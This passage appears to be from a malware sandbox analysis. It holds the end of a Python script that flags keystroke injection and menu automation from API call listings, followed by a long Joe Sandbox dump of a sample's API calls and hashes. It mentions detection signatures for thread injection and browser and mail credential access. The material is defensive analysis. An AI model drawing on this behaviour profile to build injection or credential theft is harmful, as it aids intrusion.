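    item of another window programmatically."""
    apis = {c.api for c in calls}
    enumerates = bool(apis & {"GetMenuItemCount", "GetMenuStringW"})
    return enumerates and any(decode_message(c) == "WM_COMMAND" for c in calls)


def annotate(text: str) -> list:
    """One line per call: call-site address, API, and decoded message name."""
    out = []
    for c in parse_api_listing(text):
        msg = decode_message(c)
        out.append("%08X %s.%s%s" % (c.ref, c.api, c.module, " [%s]" % msg if msg else ""))
    return out


if __name__ == "__main__":
    for sample in (SAMPLE_MENU, SAMPLE_KEYS):
        calls = parse_api_listing(sample)
        print("\n".join(annotate(sample)))
        print("keystroke injection:", flags_keystroke_injection(calls))
        print("menu automation:", flags_menu_automation(calls))
```

The flags are deliberately conservative: a GUI program that posts WM_KEYDOWN to its own controls will also trip `flags_keystroke_injection`, so treat a hit as a pointer to the function worth reading in the disassembly, not as a verdict on its own; the report's own signatures (thread injection, browser and mail credential access) are what carry the detection here.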
APIs
• GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
• VariantCopy.OLEAUT32(?,?), ref: 00451BF8
• VariantCopy.OLEAUT32(?,?), ref: 00451C0E
• VariantCopy.OLEAUT32(?,?), ref: 00451C27
• VariantClear.OLEAUT32(?), ref: 00451CA1
• SysAllocString.OLEAUT32(00000000), ref: 00451CBA
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Variant$Copy$AllocClearErrorLastString
• String ID:
• API String ID: 960795272-0
• Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
• Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
• Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
• Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
APIs
• BeginPaint.USER32(00000000,?), ref: 00447BDF
• GetWindowRect.USER32(?,?), ref: 00447C5D
• ScreenToClient.USER32(?,?), ref: 00447C7B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
• EndPaint.USER32(?,?), ref: 00447D13
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Paint$BeginClientRectRectangleScreenViewportWindow
• String ID:
• API String ID: 4189319755-0
• Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
• Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
• Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
• Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                                                                                  APIs
                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 642888154-0
                                                                                                                                                                  • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                                                  • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                                                  • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                                                                                  APIs
                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3368777196-0
                                                                                                                                                                  • Opcode ID: 3d58129ed84523c762a0542a6ce6e8838c644baaaed5c22841495022eb1511e6
                                                                                                                                                                  • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                                                                                  • Opcode Fuzzy Hash: 3d58129ed84523c762a0542a6ce6e8838c644baaaed5c22841495022eb1511e6
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$Copy$ClearErrorLast
                                                                                                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                  • API String ID: 2487901850-572801152
                                                                                                                                                                  • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                                                  • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                                                                                  • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                                                  • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Enable$Show$MessageSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1871949834-0
                                                                                                                                                                  • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                                                  • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                                                                                  • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                                                  • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                                                  • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                                                                                  • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                                                  • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                                                                                  APIs
                                                                                                                                                                  • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                                                                                  • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                                                                                  • SendMessageW.USER32 ref: 00471AE3
                                                                                                                                                                  • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3611059338-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: DestroyWindow$DeleteObject$IconMove
• String ID:
• API String ID: 1640429340-0
APIs
Similarity
• API ID: Destroy$DeleteMenuObject$IconWindow
• String ID:
• API String ID: 752480666-0
APIs
Similarity
• API ID: Destroy$DeleteObjectWindow$IconImageList_
• String ID:
• API String ID: 3275902921-0
APIs
Similarity
• API ID: Destroy$DeleteObjectWindow$IconImageList_
• String ID:
• API String ID: 3275902921-0
APIs
• Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
• QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
APIs
• SendMessageW.USER32 ref: 004555C7
• SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Similarity
• API ID: DeleteDestroyMessageObjectSend$IconWindow
• String ID:
• API String ID: 3691411573-0
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
• LineTo.GDI32(?,?,?), ref: 004472AC
• MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
• LineTo.GDI32(?,?,?), ref: 004472C6
• EndPath.GDI32(?), ref: 004472D6
• StrokePath.GDI32(?), ref: 004472E4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 372113273-0
                                                                                                                                                                  • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                                                                  • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                                                                                                  • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                                                                  • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CapsDevice$Release
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1035833867-0
                                                                                                                                                                  • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                                                                  • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                                                                                                  • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                                                                  • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                                                                                                  APIs
                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                                                                                  • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                                                                                    • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3495660284-0
                                                                                                                                                                  • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                                                                  • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                                                                                                  • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                                                                  • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                                                                                                  APIs
                                                                                                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Virtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4278518827-0
                                                                                                                                                                  • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
